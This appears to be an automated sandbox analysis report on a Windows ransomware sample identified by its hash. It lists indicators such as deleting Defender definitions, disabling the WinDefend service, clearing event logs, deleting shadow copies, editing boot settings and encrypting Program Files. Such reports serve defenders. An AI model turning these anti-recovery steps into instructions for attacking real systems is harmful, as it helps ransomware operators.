Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
59s -
max time network
128s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:50
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3716 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3176 bcdedit.exe 1200 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exedescription ioc process File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_QlNiHN3eTJY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_NxlP0sJ2V5A0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_m9iLltahkt80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_52pkZt_1a440.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_X2O-2RKa8jk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tFCAC2h44gs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_pKeeltUzQik0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_rXqCKXyfSOc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_DnFqgc19FS40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_dCDqfaxO3pA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_RfRI_CLJMuk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Yg0hVlD8qaM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_sChRZzT8NSw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Jr7pXnUQp8I0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\Content.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_lG9lEzz2aRk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Garden.jpg cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTest-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_uI6a0Yna4Ug0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_aIMX2VBYN9A0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_8Tkhy0jHrBs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_mFWDfzw05tM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_AYp3I1izMaU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_awc78q9Cy7s0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_2OsY5B-qbgw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_65pzqDrKC-U0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_CldZ8-Ka4P00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_DcYAXZEQcvM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_eS_UvneLctI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_6dmmqIGe7tI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_V-CiOBIFDRo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Phh514auOfY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_FEEI_wn2UOY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_VxUguo-IQAc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_AYs9KrOBvwQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_CST4TT1xeBA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_xyzfjPuCzws0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tMShgLgnvpM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_EbCjtQ0GFY80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_V5H1FqjYRog0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_de_DE.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_8JZX1AVwIsE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_fU3vuvwLZeI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_68xGEKR2pbs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_wp2nGckLzbk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_hrBge1nk5fA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_mj8RdPap-mQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_WhwN7eFi6Ek0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_cGbXZZBWW6M0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_pS0Tph2rMRQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_P-xlCFq9IUE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_ummp9E64X8A0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_2_qx-4pC0Hg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_vFkXe2j3g8w0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_IQRmwZuUSJ40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_1hCUWmsG8s00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\AssertPush.AAC._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_HVIJVQ00MoE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\LICENSE._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tf9kwYbl4hQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\LINEAR_RGB.pf._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_SYUzxddIn500.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Q9hlb-hUXBQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_30q1iJAnn3I0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2120 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exepid process 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 504 powershell.exe 504 powershell.exe 504 powershell.exe 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3024 wevtutil.exe Token: SeBackupPrivilege 3024 wevtutil.exe Token: SeSecurityPrivilege 2076 wevtutil.exe Token: SeBackupPrivilege 2076 wevtutil.exe Token: SeSecurityPrivilege 2988 wevtutil.exe Token: SeBackupPrivilege 2988 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3664 wmic.exe Token: SeSecurityPrivilege 3664 wmic.exe Token: SeTakeOwnershipPrivilege 3664 wmic.exe Token: SeLoadDriverPrivilege 3664 wmic.exe Token: SeSystemProfilePrivilege 3664 wmic.exe Token: SeSystemtimePrivilege 3664 wmic.exe Token: SeProfSingleProcessPrivilege 3664 wmic.exe Token: SeIncBasePriorityPrivilege 3664 wmic.exe Token: SeCreatePagefilePrivilege 3664 wmic.exe Token: SeBackupPrivilege 3664 wmic.exe Token: SeRestorePrivilege 3664 wmic.exe Token: SeShutdownPrivilege 3664 wmic.exe Token: SeDebugPrivilege 3664 wmic.exe Token: SeSystemEnvironmentPrivilege 3664 wmic.exe Token: SeRemoteShutdownPrivilege 3664 wmic.exe Token: SeUndockPrivilege 3664 wmic.exe Token: SeManageVolumePrivilege 3664 wmic.exe Token: 33 3664 wmic.exe Token: 34 3664 wmic.exe Token: 35 3664 wmic.exe Token: 36 3664 wmic.exe Token: SeIncreaseQuotaPrivilege 3856 wmic.exe Token: SeSecurityPrivilege 3856 wmic.exe Token: SeTakeOwnershipPrivilege 3856 wmic.exe Token: SeLoadDriverPrivilege 3856 wmic.exe Token: SeSystemProfilePrivilege 3856 wmic.exe Token: SeSystemtimePrivilege 3856 wmic.exe Token: SeProfSingleProcessPrivilege 3856 wmic.exe Token: SeIncBasePriorityPrivilege 3856 wmic.exe Token: SeCreatePagefilePrivilege 3856 wmic.exe Token: SeBackupPrivilege 3856 wmic.exe Token: SeRestorePrivilege 3856 wmic.exe Token: SeShutdownPrivilege 3856 wmic.exe Token: SeDebugPrivilege 3856 wmic.exe Token: SeSystemEnvironmentPrivilege 3856 wmic.exe Token: SeRemoteShutdownPrivilege 3856 wmic.exe Token: SeUndockPrivilege 3856 wmic.exe Token: SeManageVolumePrivilege 3856 wmic.exe Token: 33 3856 wmic.exe Token: 34 3856 wmic.exe Token: 35 3856 wmic.exe Token: 36 3856 wmic.exe Token: SeIncreaseQuotaPrivilege 3856 wmic.exe Token: SeSecurityPrivilege 3856 wmic.exe Token: SeTakeOwnershipPrivilege 3856 wmic.exe Token: SeLoadDriverPrivilege 3856 wmic.exe Token: SeSystemProfilePrivilege 3856 wmic.exe Token: SeSystemtimePrivilege 3856 wmic.exe Token: SeProfSingleProcessPrivilege 3856 wmic.exe Token: SeIncBasePriorityPrivilege 3856 wmic.exe Token: SeCreatePagefilePrivilege 3856 wmic.exe Token: SeBackupPrivilege 3856 wmic.exe Token: SeRestorePrivilege 3856 wmic.exe Token: SeShutdownPrivilege 3856 wmic.exe Token: SeDebugPrivilege 3856 wmic.exe Token: SeSystemEnvironmentPrivilege 3856 wmic.exe Token: SeRemoteShutdownPrivilege 3856 wmic.exe Token: SeUndockPrivilege 3856 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2340 wrote to memory of 2724 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 2724 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2724 wrote to memory of 3244 2724 net.exe net1.exe PID 2724 wrote to memory of 3244 2724 net.exe net1.exe PID 2340 wrote to memory of 3536 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 3536 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3536 wrote to memory of 3580 3536 net.exe net1.exe PID 3536 wrote to memory of 3580 3536 net.exe net1.exe PID 2340 wrote to memory of 2420 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 2420 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2420 wrote to memory of 3320 2420 net.exe net1.exe PID 2420 wrote to memory of 3320 2420 net.exe net1.exe PID 2340 wrote to memory of 852 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 852 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 852 wrote to memory of 2300 852 net.exe net1.exe PID 852 wrote to memory of 2300 852 net.exe net1.exe PID 2340 wrote to memory of 3588 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 3588 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3588 wrote to memory of 3360 3588 net.exe net1.exe PID 3588 wrote to memory of 3360 3588 net.exe net1.exe PID 2340 wrote to memory of 3388 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 3388 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3388 wrote to memory of 1812 3388 net.exe net1.exe PID 3388 wrote to memory of 1812 3388 net.exe net1.exe PID 2340 wrote to memory of 3692 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 3692 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 3692 wrote to memory of 500 3692 net.exe net1.exe PID 3692 wrote to memory of 500 3692 net.exe net1.exe PID 2340 wrote to memory of 2824 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 2824 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2824 wrote to memory of 1160 2824 net.exe net1.exe PID 2824 wrote to memory of 1160 2824 net.exe net1.exe PID 2340 wrote to memory of 2840 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2340 wrote to memory of 2840 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2840 wrote to memory of 600 2840 net.exe net1.exe PID 2840 wrote to memory of 600 2840 net.exe net1.exe PID 2340 wrote to memory of 908 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 908 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2340 wrote to memory of 700 2340 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe 